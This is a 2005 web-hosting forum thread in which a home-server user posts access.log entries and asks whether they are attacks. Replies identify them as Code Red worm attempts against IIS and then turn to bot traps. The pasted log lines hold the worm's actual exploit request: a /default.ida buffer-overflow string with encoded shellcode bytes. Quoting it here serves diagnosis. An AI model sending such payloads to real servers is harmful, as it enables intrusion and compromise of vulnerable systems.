March 23, 200520 yr comment_260 Hi guys, I have no idea if this is the place to ask, so you'll have to forgive me.I'm hosting my domain with my computer and uniformServer as... server. Today while reading access.log (just pure curiosrity) I observed some really strange entries into the log. If necessary I can post all entries I'm talking about, but for now I will just post a fragment.I can see in the error.log that the requests are treated either as "File does not exist" or "URI too long". Never the less, is someone trying to atack the server or what?Here's a fragment:>> 211.158.113.35 - - [23/Mar/2005:20:02:10 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1323 >> 222.91.35.92 - - [23/Mar/2005:20:10:49 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1323 >>216.251.92.99 - - [23/Mar/2005:20:18:30 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1323 There are few some are really really long, looking like "x90\x02\xb1\x02\xb1\x". Any ideas? Do you know what deault.ida might be? There is no such file on my server. Report
March 24, 200520 yr comment_261 Hmm.. It could be a hacker or a bot. It may also not be it if it is occuring from different IPs. If it is happening from different IPs, then it is not a hacker, but could be a search bot or something like that... Best Regards Olajide Olaolorun The Uniform Server Development Team Report
March 24, 200520 yr comment_262 The IP you used to post this topic refers to Google... hmm... "...out of ideas..." Best Regards Olajide Olaolorun The Uniform Server Development Team Report
March 24, 200520 yr comment_264 Except for the file name it rather looks like the Santy-worm that attacks phpBB boards - my guess is that those are hacking attempts, from either an actual hacker or from hacked PCs. Report
March 24, 200520 yr comment_265 http://www.thesitewizard.com/news/coderediiworm.shtml Its CodeRed worm attacks. Report
March 24, 200520 yr comment_267 Wow.... learning something new everyday.. seems like it is only unsafe for IIS LOL Best Regards Olajide Olaolorun The Uniform Server Development Team Report
May 8, 200520 yr comment_712 you should see my server logs... omfg, they're full of crap like that.. i dont care so much about those, that's what debian and apache are for. but the scumbags who work for the riaa and their web crawlers that disobey or ignore robots.txt, and hammer away at a site as fast as they can.. i have a nifty, slow-loading, little infinite bot trap black hole for them, and the worst ones get filtered at the firewall instead. am looking at a dynamic robots.txt though, i saw a site that has an example in perl, it's pretty sweet.. ahh, here it is.. a little outdated, but it gives me a place to start... http://www.leekillough.com/robots.html Report
May 8, 200520 yr comment_719 Not bad Best Regards Olajide Olaolorun The Uniform Server Development Team Report
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.